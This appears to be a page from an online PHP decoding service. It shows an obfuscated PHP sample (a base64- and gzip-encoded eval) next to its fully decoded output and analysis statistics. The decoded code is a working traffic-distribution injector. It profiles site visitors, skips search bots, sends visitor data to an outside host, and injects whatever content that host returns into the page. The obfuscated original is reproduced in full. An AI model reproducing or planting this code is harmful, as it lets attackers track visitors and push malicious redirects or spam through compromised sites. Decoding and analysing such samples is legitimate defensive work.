Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?ob_start();$a='eNrtWOtz2jgQ/35/hctkCp46Ca9Aerk8OGLSXGlICbSdyzAe2SigBj9qiwBt8r/fyrZs2caQ3..

Decoded Output download

ob_end_clean();?><?php
 @ini_set('display_errors', 0); @error_reporting(0); $api_id = 'FaceKeit'; $api_key_host = 'idBFJxLTpCNXxbLizZewGL'; $api_url = 'http://security.stream-tds.com/user/27617e2341bb52f89b31daa6773b2d362415056460174bb4/?api='; $api_em_referer = 0; $api_em_useragent = 1; $api_ipv6 = 1; $api_rd_bots = 1; $api_rotator = 1; $api_n_cookies = 'qwerty'; $api_t_cookies = 3600; $api_connect = 1; $api_timeout_connect = 10; $api_status = 1; if($api_status == 1){ $api_out = ''; $api_lang = ''; $api_country = ''; $api_city = ''; $api_device = ''; $api_operator = ''; $api_bot = ''; $api_uniq = ''; $api_empty = '-'; $api_bot = $api_empty; $api_api_data = ''; if(!empty($_SERVER['HTTP_USER_AGENT'])){ $api_useragent = $_SERVER['HTTP_USER_AGENT']; } else{ if($api_em_useragent == 1){ $api_bot = 'others'; } $api_useragent = $api_empty; } if(!empty($_SERVER['HTTP_REFERER'])){ $api_referer = $_SERVER['HTTP_REFERER']; $api_ref = $api_referer; if(stristr($api_referer, 'google')){$api_se = 'google';} if(stristr($api_referer, 'yandex')){$api_se = 'yandex';} if(stristr($api_referer, 'mail.ru')){$api_se = 'mail';} if(stristr($api_referer, 'yahoo')){$api_se = 'yahoo';} if(stristr($api_referer, 'bing')){$api_se = 'bing';} if(empty($api_se)){$api_se = $api_empty;} } else{ if($api_em_referer == 1){ $api_bot = 'others'; } $api_referer = $api_empty; $api_ref = ''; $api_se = $api_empty; } if(stristr($api_useragent, 'baidu')){$api_bot = 'baidu';} if(stristr($api_useragent, 'bing') || stristr($api_useragent, 'msnbot')){$api_bot = 'bing';} if(stristr($api_useragent, 'google')){$api_bot = 'google';} if(stristr($api_useragent, 'mail.ru')){$api_bot = 'mail';} if(stristr($api_useragent, 'yahoo')){$api_bot = 'yahoo';} if(stristr($api_useragent, 'yandex')){$api_bot = 'yandex';} if($api_bot == $api_empty){ $signature = 'bot,spider,crawler,copier,aport,rambler,nigma,ask,ia_archiver,crowsnest,peerindex,slurp,ning,js-kit,twiceler,java,commentreader,yeti,btwebclient,ezooms,teleport,offline,disco,netvampire,httrack'; $ex = explode(",", $signature); $x = 0; while(!empty($ex[$x])){ if(stristr($api_useragent, $ex[$x])){ $api_bot = 'others'; break; } $x++; } } if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR']){ if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'],".")>0 && strpos($_SERVER['HTTP_X_FORWARDED_FOR'],",")>0){ $api_ip = explode(",",$_SERVER['HTTP_X_FORWARDED_FOR']); $api_ipuser = trim($api_ip[0]); } elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'],".")>0 && strpos($_SERVER['HTTP_X_FORWARDED_FOR'],",")===false){ $api_ipuser = trim($_SERVER['HTTP_X_FORWARDED_FOR']); } } if(!isset($api_ipuser)){ $api_ipuser = trim($_SERVER['REMOTE_ADDR']); } if(!filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) && !filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $api_ipuser = $api_empty; } if($api_ipv6 == 1 && filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $api_bot = 'others'; } if(($api_bot == $api_empty || $api_rd_bots == 1) && $api_ipuser != $api_empty){ $api_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); if(empty($api_lang)){$api_lang = $api_empty;} $api_domain = $_SERVER['HTTP_HOST']; $api_page_url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if($api_rotator == 1){ if(!isset($_COOKIE[$api_n_cookies])){ SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; $api_uniq = 'yes'; } else{ $api_c_counter = $_COOKIE[$api_n_cookies] + 1; SetCookie($api_n_cookies, $api_c_counter, time() + $api_t_cookies, '/'); $api_uniq = 'no'; } } else{ $api_uniq = 'yes'; } $api_data = array( "api_key_host"=>$api_key_host, "id"=>$api_id, "ipuser"=>$api_ipuser, "lang"=>$api_lang, "referer"=>$api_referer, "useragent"=>$api_useragent, "uniq"=>$api_uniq, "domain"=>$api_domain, "se"=>$api_se, "key"=>@urlencode($api_key), "macro_1"=>@urlencode($api_parameter_1), "macro_2"=>@urlencode($api_parameter_2), "macro_3"=>@urlencode($api_parameter_3), "macro_4"=>@urlencode($api_parameter_4), "macro_5"=>@urlencode($api_parameter_5), "macro_6"=>@urlencode($api_parameter_6), "macro_7"=>@urlencode($api_parameter_7), "macro_8"=>@urlencode($api_parameter_8), "macro_9"=>@urlencode($api_parameter_9), "macro_10"=>@urlencode($api_parameter_10) ); $api_data = $api_url.base64_encode(serialize($api_data)); if($api_connect == 0){ $api_api_data = @file_get_contents($api_data); } else{ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, $api_timeout_connect); curl_setopt($ch, CURLOPT_URL, $api_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); $api_api_data = curl_exec($ch); } $api_api_data_tmp = @unserialize($api_api_data); if(is_array($api_api_data_tmp)){ $api_out = trim(html_entity_decode($api_api_data_tmp[0], ENT_QUOTES, 'UTF-8')); $api_lang = $api_api_data_tmp[1]; $api_country = $api_api_data_tmp[2]; $api_city = $api_api_data_tmp[3]; $api_device = $api_api_data_tmp[4]; $api_operator = $api_api_data_tmp[5]; $api_bot = $api_api_data_tmp[6]; $api_uniq = $api_api_data_tmp[7]; if(stristr($api_out, '|||') && $api_rotator == 1){ $api_out_ex = explode('|||', $api_out); if(isset($api_out_ex[$api_c_counter])){ $api_test = trim($api_out_ex[$api_c_counter]); } if(!empty($api_test)){ $api_out = trim($api_out_ex[$api_c_counter]); } else{ $api_out = trim($api_out_ex[0]); SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; } } else{ if(stristr($api_out, '|||')){ $api_out_ex = explode('|||', $api_out); $api_out = trim($api_out_ex[0]); } } } else{ $api_out = trim(html_entity_decode($api_api_data, ENT_QUOTES, 'UTF-8')); if(stristr($api_out, '|||') && $api_rotator == 1){ $api_out_ex = explode('|||', $api_out); if(isset($api_out_ex[$api_c_counter])){ $api_test = trim($api_out_ex[$api_c_counter]); } if(!empty($api_test)){ $api_out = trim($api_out_ex[$api_c_counter]); } else{ $api_out = trim($api_out_ex[0]); SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; } } else{ if(stristr($api_out, '|||')){ $api_out_ex = explode('|||', $api_out); $api_out = trim($api_out_ex[0]); } } } } if(stristr($api_out, '[RAWURLENCODE_REFERER]')){ $api_out = str_ireplace('[RAWURLENCODE_REFERER]', rawurlencode($api_ref), $api_out); } if(stristr($api_out, '[URLENCODE_REFERER]')){ $api_out = str_ireplace('[URLENCODE_REFERER]', urlencode($api_ref), $api_out); } if(stristr($api_out, '[RAWURLENCODE_PAGE_URL]')){ $api_out = str_ireplace('[RAWURLENCODE_PAGE_URL]', rawurlencode($api_page_url), $api_out); } if(stristr($api_out, '[URLENCODE_PAGE_URL]')){ $api_out = str_ireplace('[URLENCODE_PAGE_URL]', urlencode($api_page_url), $api_out); } } ?>

Did this file decode correctly?

Original Code

<?ob_start();$a='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';eval(gzuncompress(base64_decode($a)));$v=ob_get_contents();ob_end_clean();?>

Function Calls

ob_start 1
gzuncompress 1
ob_end_clean 1
base64_decode 1
ob_get_contents 1

Variables

$a eNrtWOtz2jgQ/35/hctkCp46Ca9Aerk8OGLSXGlICbSdyzAe2SigBj9qiwBt..
$v

Stats

MD5 6ee98dbfd9292f438aec8317971c594b
Eval Count 1
Decode Time 89 ms